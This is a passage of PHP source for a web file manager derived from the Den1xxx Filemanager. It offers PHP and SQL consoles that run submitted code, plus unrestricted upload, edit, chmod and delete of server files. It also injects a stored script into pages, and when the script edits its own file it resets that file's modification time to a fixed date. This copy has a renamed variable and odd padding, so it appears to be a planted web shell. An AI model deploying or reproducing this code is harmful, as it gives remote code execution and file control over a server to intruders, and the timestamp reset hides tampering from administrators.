'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'

'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'

'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>

<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>

'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'

'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'

'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'

'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'

'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'

<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>

</form>

</table>
<table>

<form method="post" action="">

<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>

<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>

<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>

<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>

</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {

	die($proxy_form);

} elseif (isset($res_lng)) {	

?>
<table class="whole">
<tr>
                          <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>
                          <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php

	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>

</tr>
<tr>

                          <td class="row1">

		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">

		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">

		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">

<?php

$str_tmpl = $res_lng.'_templates';

$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){

	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";

	$select .= '<option value="-1">' . __('Select') . "</option>\n";

	foreach ($tmpl as $key=>$value){

		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";

	}

	$select .= "</select>\n";
	echo $select;

}

?>

		</form>

	</td>

</tr>

</table>
<?php

	if (!empty($res)) {

		$fun='fm_'.$res_lng;

		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);

	                          if (file_put_contents($fn, $_REQUEST['newcontent'])) $msgHiyagasa .= __('File updated');
		else $msgHiyagasa .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);

		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);

		}
	}

                          $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
                          $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;

                          $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
                          <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>

</tr>

<tr>

                          <td class="row1">

                                                    <?=$msgHiyagasa?>
	</td>
</tr>
<tr>
                          <td class="row1">
                                                    <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>

<tr>

                          <td class="row1" align="center">

                                                    <form name="form1" method="post" action="<?=$editlink?>">

                                                                              <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>

                                                                              <input type="submit" name="save" value="<?=__('Submit')?>">

                                                                              <input type="submit" name="cancel" value="<?=__('Cancel')?>">

                                                    </form>
                          </td>
</tr>

</table>
<?php

echo $auth['script'];

} elseif(!empty($_REQUEST['rights'])){

	if(!empty($_REQUEST['save'])) {
	                          if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msgHiyagasa .= (__('File updated')); 

		else $msgHiyagasa .= (__('Error occurred'));

	}

	clearstatcache();

                          $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);

                          $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;

                          $backlink = $url_inc . '&path=' . $path;

?>

<table class="whole">
<tr>
                          <th><?=__('File manager').' - '.$path?></th>
</tr>

<tr>

                          <td class="row1">

                                                    <?=$msgHiyagasa?>

	</td>

</tr>

<tr>
                          <td class="row1">

                                                    <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>

</tr>
<tr>
                          <td class="row1" align="center">
                                                    <form name="form1" method="post" action="<?=$link?>">

                                                       <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
                                                    <?php if (is_dir($path.$_REQUEST['rights'])) { ?>

                                                                              <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>

                                                    <?php } ?>
                                                                              <input type="submit" name="save" value="<?=__('Submit')?>">
                                                    </form>

                          </td>
</tr>

</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	                          rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);

		$msgHiyagasa .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];

	}

	clearstatcache();

                          $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;

                          $backlink = $url_inc . '&path=' . $path;

?>

<table class="whole">

<tr>

                          <th><?=__('File manager').' - '.$path?></th>
</tr>

<tr>
                          <td class="row1">
                                                    <?=$msgHiyagasa?>

	</td>
</tr>
<tr>

                          <td class="row1">

                                                    <a href="<?=$backlink?>"><?=__('Back')?></a>

	</td>
</tr>

<tr>
                          <td class="row1" align="center">

                                                    <form name="form1" method="post" action="<?=$link?>">

                                                                              <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
                                                                              <input type="submit" name="save" value="<?=__('Submit')?>">

                                                    </form>
                          </td>

</tr>
</table>

<?php

} else {
//Let's rock!
                          $msgHiyagasa = '';
                          if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
                                                    if(!empty($_FILES['upload']['name'])){
                                                                              $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

                                                                              if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                                                                                                        $msgHiyagasa .= __('Error occurred');

                                                                              } else {
				$msgHiyagasa .= __('Files uploaded').': '.$_FILES['upload']['name'];
			}

                                                    }
                          } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

                                                    if(!fm_del_files(($path . $_REQUEST['delete']), true)) {

                                                                              $msgHiyagasa .= __('Error occurred');
                                                    } else {

			$msgHiyagasa .= __('Deleted').' '.$_REQUEST['delete'];

		}
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
                                                    if(!@mkdir($path . $_REQUEST['dirname'],0777)) {

                                                                              $msgHiyagasa .= __('Error occurred');

                                                    } else {
			$msgHiyagasa .= __('Created').' '.$_REQUEST['dirname'];

		}
                          } elseif(!empty($_POST['search_recursive'])) {

		ini_set('max_execution_time', '0');
		$search_data =  find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']);
		if(!empty($search_data)) {
			$msgHiyagasa .= __('Found in files').' ('.count($search_data).'):<br>';

			foreach ($search_data as $filename) {

				$msgHiyagasa .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

			}

		} else {
			$msgHiyagasa .= __('Nothing founded');

		}	

	} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
                                                    if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

                                                                              $msgHiyagasa .= __('Error occurred');
                                                    } else {
			fclose($fp);

			$msgHiyagasa .= __('Created').' '.$_REQUEST['filename'];
		}
                          } elseif (isset($_GET['zip'])) {

		$source = base64_decode($_GET['zip']);

		$destination = basename($source).'.zip';
		set_time_limit(0);
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);

		if (is_file($destination))
		$msgHiyagasa .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
		'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
		else $msgHiyagasa .= __('Error occurred').': '.__('no files');
	} elseif (isset($_GET['gz'])) {
		$source = base64_decode($_GET['gz']);
		$archive = $source.'.tar';

		$destination = basename($source).'.tar';

		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		clearstatcache();
		set_time_limit(0);

		//die();

		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);

		$phar->compress(Phar::GZ,'.tar.gz');

		unset($phar);

		if (is_file($archive)) {

			if (is_file($archive.'.gz')) {
				unlink($archive); 

				$destination .= '.gz';
			}


			$msgHiyagasa .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		} else $msgHiyagasa .= __('Error occurred').': '.__('no files');

	} elseif (isset($_GET['decompress'])) {

		// $source = base64_decode($_GET['decompress']);

		// $destination = basename($source);

		// $ext = end(explode(".", $destination));

		// if ($ext=='zip' OR $ext=='gz') {
			// $phar = new PharData($source);

			// $phar->decompress();

			// $base_file = str_replace('.'.$ext,'',$destination);
			// $ext = end(explode(".", $base_file));
			// if ($ext=='tar'){

				// $phar = new PharData($base_file);
				// $phar->extractTo(dir($source));

			// }
		// } 
		// $msgHiyagasa .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
	} elseif (isset($_GET['gzfile'])) {

		$source = base64_decode($_GET['gzfile']);


		$archive = $source.'.tar';

		$destination = basename($source).'.tar';

		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		set_time_limit(0);

		//echo $destination;
		$ext_arr = explode('.',basename($source));

		if (isset($ext_arr[1])) {
			unset($ext_arr[0]);
			$ext=implode('.',$ext_arr);
		} 

		$phar = new PharData($destination);

		$phar->addFile($source);
		$phar->compress(Phar::GZ,$ext.'.tar.gz');

		unset($phar);
		if (is_file($archive)) {

			if (is_file($archive.'.gz')) {

				unlink($archive); 

				$destination .= '.gz';

			}

			$msgHiyagasa .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		} else $msgHiyagasa .= __('Error occurred').': '.__('no files');

	}

?>

<table class="whole" id="header_table" >
<tr>

                          <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>

</tr>

<?php if(!empty($msgHiyagasa)){ ?>

<tr>
	<td colspan="2" class="row2"><?=$msgHiyagasa?></td>

</tr>
<?php } ?>

<tr>
                          <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>

			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>

			<?php } ?>

			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>

				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path"                           value="<?=$path?>" />

				<input type="text"   name="filename" size="15">
				<input type="submit" name="mkfile"   value="<?=__('New file')?>">

				</form>

			<?php } ?>

			</td>

			<td>

				<form  method="post" action="<?=$url_inc?>" style="display:inline">

				<input type="hidden" name="path" value="<?=$path?>" />

				<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">

				<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">

				<input type="submit" name="search" value="<?=__('Search')?>">

				</form>

			</td>
			<td>
			<?=fm_run_input('php')?>

			</td>

			<td>

			<?=fm_run_input('sql')?>

			</td>
			</tr>
		</table>

                          </td>
                          <td class="row3">
		<table>

		<tr>

		<td>

		<?php if (!empty($fm_config['upload_file'])) { ?>

			<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
			<input type="hidden" name="path" value="<?=$path?>" />

			<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
			<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />

			<input type="submit" name="test" value="<?=__('Upload')?>" />
			</form>

		<?php } ?>
		</td>
		<td>
		<?php if ($auth['authorize']) { ?>

			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">

			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>

		<?php } ?>

		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
                          </td>

</tr>

</table>

<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">

<thead>

<tr> 
                          <th style="white-space:nowrap"> <?=__('Filename')?> </th>

                          <th style="white-space:nowrap"> <?=__('Size')?> </th>

                          <th style="white-space:nowrap"> <?=__('Date')?> </th>

                          <th style="white-space:nowrap"> <?=__('Rights')?> </th>
                          <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>

</tr>

</thead>

<tbody>

<?php
$elements = fm_scan_dir($path, '', 'all', true);

$dirs = array();

$files = array();

foreach ($elements as $file_code){

                          if(@is_dir($path . $file_code)){
                                                    $dirs[] = $file_code;
                          } else {

                            
                                                    $files[] = $file_code;
                          }

}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);


foreach ($elements as $file_code){
                          $filename = $path . $file_code;
                          $filedata = @stat($filename);

                          if(@is_dir($filename)){

		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file_code)) $filedata[7] = fm_dir_size($filename);

                                                    $link = '<a href="'.$url_inc.'&path='.$path.$file_code.'" title="'.__('Show').' '.$file_code.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_code.'</a>';

                                                    $loadlink= (fm_root($file_code)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file_code);
		$arlink  = (fm_root($file_code)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file_code);

                                                    $style = 'row2';
		 if (!fm_root($file_code)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file_code. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file_code . '&path=' . $path  . '\'"'; else $alert = '';
                          } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''

			. fm_img_link($filename)

			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_code.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file_code . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file_code.'</a>';
		$e_arr = explode(".", $file_code);
		$ext = end($e_arr);
                                                    $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file_code);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''

		: ((fm_root($file_code)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file_code));
                                                    $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file_code. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file_code . '&path=' . $path  . '\'"';

                          }

                          $deletelink = fm_root($file_code) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file_code . '" ' . $alert . '>' . __('Delete') . '</a>';

                          $renamelink = fm_root($file_code) ? '' : '<a href="' . $url_inc . '&rename=' . $file_code . '&path=' . $path . '" title="' . __('Rename') .' '. $file_code . '">' . __('Rename') . '</a>';
                          $rightstext = ($file_code=='.' || $file_code=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file_code . '&path=' . $path . '" title="' . __('Rights') .' '. $file_code . '">' . @fm_rights_string($filename) . '</a>';

?>

<tr class="<?=$style?>"> 
                          <td><?=$link?></td>

                          <td><?=$filedata[7]?></td>

                          <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
                          <td><?=$rightstext?></td>
                          <td><?=$deletelink?></td>
                          <td><?=$renamelink?></td>

                          <td><?=$loadlink?></td>
                          <td><?=$arlink?></td>

</tr>
<?php

                          }

}
?>

</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 

	$totaltime = $mtime[0] + $mtime[1] - $starttime; 

	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';

	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();

	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();

	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);

	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';

	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>

<script type="text/javascript">


function download_xls(filename, text) {


	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';

	document.body.appendChild(element);
	element.click();

	document.body.removeChild(element);
}





function base64_encode(m) {



	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {

		c = m.charCodeAt(l);

		if (128 > c) d = 1;

		else

			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])

	}
	b && (g += k[f << 6 - b]);

	return g
}


var tableToExcelData = (function() {
                          var uri = 'data:application/vnd.ms-excel;base64,',

                          template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',

                          format = function(s, c) {
                                                                              return s.replace(/{(\w+)}/g, function(m, p) {

                                                                                                        return c[p];
                                                                              })

                                                    }

                          return function(table, name) {
                                                    if (!table.nodeType) table = document.getElementById(table)
                                                    var ctx = {
                                                                              worksheet: name || 'Worksheet',

                                                                              table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")

                                                    }
		t = new Date();

		filename = 'fm_' + t.toISOString() + '.xls'

		download_xls(filename, base64_encode(format(template, ctx)))
                          }

})();


var table2Excel = function () {



                          var ua = window.navigator.userAgent;
                          var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 

		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer


				var x = document.getElementById(el).rows;



				var xls = new ActiveXObject("Excel.Application");



				xls.visible = true;
				xls.Workbooks.Add

				for (i = 0; i < x.length; i++) {

					var y = x[i].cells;


					for (j = 0; j < y.length; j++) {

						xls.Cells(i + 1, j + 1).Value = y[j].innerText;

					}
				}

				xls.Visible = true;

				xls.UserControl = true;

				return xls;

			} else {
				tableToExcelData(el, name);
			}
		}

}
</script>

</body>

</html>


<?php

//Ported from ReloadCMS project http://reloadcms.com

class tarHandler {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;

	var $isGzipped = true;

	var $errors = array();
	var $files = array();



	
function initialize(){



		if (!isset($this->errors)) $this->errors = array();

	}


	

function generateArchive($file_list){



		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){

			if (!$this->openFileForWriting()) return false;

		} else {

			if (filesize($this->archive_name) == 0)	return $this->openFileForWriting();
			if ($this->isGzipped) {
				$this->closeTemporaryFile();

				if (!rename($this->archive_name, $this->archive_name.'.tmp')){

					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';

					return false;
				}

				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){

					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);

					return false;
				}
				if (!$this->openFileForWriting()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){

					do {
						$binaryData = pack('a512', $buffer);

						$this->writeDataBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;

			}

		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->compressFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');

		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');

			$this->writeDataBlock($binaryData);

		}
		$this->closeTemporaryFile();
		if ($newArchive && !$result){
		$this->closeTemporaryFile();
		unlink($this->archive_name);
		}
		return $result;
	}



	
function extractArchive($path){



		$fileName = $this->archive_name;
		if (!$this->isGzipped){

			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);

					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}

				}
			}

			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;

		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');

		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;

		}
		$result = $this->decompressFileArray($path);

			$this->closeTemporaryFile();

		return $result;
	}



	function displayErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {

		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';

			foreach ($Errors as $value)

				$message .= $value.'<br/>';
			return $message;	

		} else return '';

	}


	

function compressFileArray($file_array){



		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)

                                                      return true;

		for ($i = 0; $i<count($file_array); $i++){

			$filename = $file_array[$i];

			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)

				continue;

			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;

				continue;

			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');

			return false;

			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;

			return false;

		}
		$filename = str_replace('\\', '/', $filename);

		$keep_filename = $this->sanitizePath($filename);

		if (is_file($filename)){

			if (($file_code = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');

			}

				if(($this->file_pos == 0)){

					if(!$this->writeFileHeader($filename, $keep_filename))

						return false;
				}

				while (($buffer = fread($file_code, 512)) != ''){
					$binaryData = pack('a512', $buffer);

					$this->writeDataBlock($binaryData);

				}

			fclose($file_code);
		}	else $this->writeFileHeader($filename, $keep_filename);

			if (@is_dir($filename)){

				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');

					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else

							$file_array_tmp[] = $dir;


						$result = $this->compressFileArray($file_array_tmp);

					}

				}

				unset($file_array_tmp);
				unset($dir);

				unset($handle);
			}

		}
		return $result;
	}


	

function decompressFileArray($path){

 

		$path = str_replace('\\', '/', $path);

		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;

		clearstatcache();

		while (strlen($binaryData = $this->readDataBlock()) != 0){
			if (!$this->parseHeader($binaryData, $header)) return false;

			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header

				$filename = '';
				$decr = floor($header['size']/512);

				for ($i = 0; $i < $decr; $i++){
					$content = $this->readDataBlock();

					$filename .= $content;
				}

				if (($laspiece = $header['size'] % 512) != 0){

					$content = $this->readDataBlock();

					$filename .= substr($content, 0, $laspiece);

				}

				$binaryData = $this->readDataBlock();
				if (!$this->parseHeader($binaryData, $header)) return false;

				else $header['filename'] = $filename;

				return true;
			}

			if (($path != './') && ($path != '/')){

